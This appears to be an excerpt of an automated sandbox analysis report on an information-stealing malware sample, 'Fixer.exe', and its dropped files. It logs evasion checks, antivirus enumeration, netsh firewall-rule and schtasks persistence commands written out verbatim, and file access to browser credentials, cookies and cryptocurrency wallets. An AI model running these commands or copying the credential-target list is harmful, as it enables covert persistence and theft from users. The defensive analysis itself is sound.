                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = 'Camera'
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = 'Camera'
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = 'Camera'
                      Source: C:\Windows\System32\Defender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = 'Camera'
                      Source: C:\Users\user\Desktop\Fixer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\System32\Defender.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\Desktop\Fixer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\System32\Defender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002941000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.0000000002741000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000002E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Fixer.exe Memory allocated: 29C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Fixer.exe Memory allocated: 2BA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Fixer.exe Memory allocated: 29E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Memory allocated: 24D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Memory allocated: 1A7B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Memory allocated: 1080000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Memory allocated: 1AA80000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Memory allocated: 2680000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Memory allocated: 1A940000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Memory allocated: D30000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Memory allocated: 1A8D0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exe Memory allocated: E40000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exe Memory allocated: 1AB00000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Memory allocated: CE0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Memory allocated: 1A740000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exe Memory allocated: 1180000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exe Memory allocated: 1ABE0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Memory allocated: 13C0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Memory allocated: 1AE80000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exe Memory allocated: 26C0000 memory reserve | memory write watch
                      Source: C:\Windows\System32\Defender.exe Memory allocated: 1A940000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Code function: 2_2_00007FFA1B3C7198 rdtsc 2_2_00007FFA1B3C7198
                      Source: C:\Users\user\Desktop\Fixer.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\Defender.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\Fixer.exe Window / User API: threadDelayed 9958
                      Source: C:\Users\user\Desktop\Fixer.exe TID: 7388 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe TID: 7844 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe TID: 5700 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe TID: 5396 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe TID: 2696 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\Defender.exe TID: 1076 Thread sleep count: 54 > 30
                      Source: C:\Windows\System32\Defender.exe TID: 1076 Thread sleep time: -35000s >= -30000s
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe TID: 5024 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\Defender.exe TID: 7328 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe TID: 5560 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\Defender.exe TID: 7104 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Fixer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\Defender.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\Defender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\Defender.exe Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe File opened: C:\Users\user
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe File opened: C:\Users\user\AppData
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe File opened: C:\Users\user\AppData\Roaming
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000003129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qemu-g
                      Source: Defender.exe, 00000014.00000002.53603195774.000000001B756000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM+_r
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000003129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qemu-ga
                      Source: xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.00000000030A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
                      Source: Defender.exe, 00000014.00000002.53603195774.000000001B756000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHa%SystemRoot%\system32\mswsock.dll </faultPropagationQueries>
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000003129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qemu-
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52841079355.0000000002A44000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52866509335.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52877664599.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52889295522.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000017.00000002.53431573615.0000000003129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\qemu-ga
                      Source: Fixer.exe, 00000000.00000002.52599130900.0000000000E61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Fixer.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Process token adjusted: Debug
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe Process token adjusted: Debug
                      Source: C:\Windows\System32\Defender.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\Fixer.exe Memory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\Fixer.exe Process created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe"
                      Source: C:\Users\user\Desktop\Fixer.exe Process created: C:\Users\user\AppData\Local\Temp\FixerNerest.exe "C:\Users\user\AppData\Local\Temp\FixerNerest.exe"
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Process created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name="7=PG%XL(%PSA%R" dir=in action=allow program="C:\Windows\System32\xdwdSecurityHealthSystrays.exe" enable=yes & exit
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Process created: C:\Windows\System32\xdwdSecurityHealthSystrays.exe "C:\Windows\System32\xdwdSecurityHealthSystrays.exe"
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Process created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe Process created: C:\Windows\System32\Defender.exe "C:\Windows\System32\Defender.exe"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Users\user\Desktop\Fixer.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FixerNerest.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeQueries volume information: C:\Windows\System32\xdwdSecurityHealthSystrays.exe VolumeInformation
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeQueries volume information: C:\Windows\System32\xdwdSecurityHealthSystrays.exe VolumeInformation
                      Source: C:\Windows\System32\Defender.exeQueries volume information: C:\Windows\System32\Defender.exe VolumeInformation
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeQueries volume information: C:\Windows\System32\xdwdSecurityHealthSystrays.exe VolumeInformation
                      Source: C:\Windows\System32\Defender.exeQueries volume information: C:\Windows\System32\Defender.exe VolumeInformation
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeQueries volume information: C:\Windows\System32\xdwdSecurityHealthSystrays.exe VolumeInformation
                      Source: C:\Windows\System32\Defender.exeQueries volume information: C:\Windows\System32\Defender.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Fixer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe | Process created: C:\Windows\System32\cmd.exe "CMD" netsh advfirewall firewall add rule name="7=PG%XL(%PSA%R" dir=in action=allow program="C:\Windows\System32\xdwdSecurityHealthSystrays.exe" enable=yes & exit
                      Source: 6z9uno0baqvej0me.exe, 00000002.00000002.52854929641.000000001B3BE000.00000004.00000020.00020000.00000000.sdmp, 6z9uno0baqvej0me.exe, 00000002.00000002.52839355797.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, FixerNerest.exe, 00000003.00000002.52861531971.000000001B686000.00000004.00000020.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52882971819.000000001B580000.00000004.00000020.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 0000000D.00000002.52882315101.000000001B515000.00000004.00000020.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000013.00000002.52896577157.000000001B399000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000014.00000002.53586488043.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000014.00000002.53603195774.000000001B6D0000.00000004.00000020.00020000.00000000.sdmp, xdwdSecurityHealthSystrays.exe, 00000015.00000002.52910259990.000000001B314000.00000004.00000020.00020000.00000000.sdmp, Defender.exe, 00000016.00000002.52917676072.0000000000C58000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\Desktop\Fixer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\Defender.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\Defender.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\Defender.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match | File source: Fixer.exe, type: SAMPLE
                      Source: Yara match | File source: dump.pcap, type: PCAP
                      Source: Yara match | File source: 0.0.Fixer.exe.670000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000000.52343849796.0000000000672000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Fixer.exe PID: 7492, type: MEMORYSTR
                      Source: Yara match | File source: 2.2.6z9uno0baqvej0me.exe.12803b30.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.6z9uno0baqvej0me.exe.12803b30.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: 6z9uno0baqvej0me.exe PID: 5376, type: MEMORYSTR
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum\walletsLR
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: q-cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum\walletsLR
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum\walletsLR
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: q&%localappdata%\Coinomi\Coinomi\walletsLR
                      Source: Fixer.exe, 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\atomic\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Users\user\Desktop\Fixer.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\
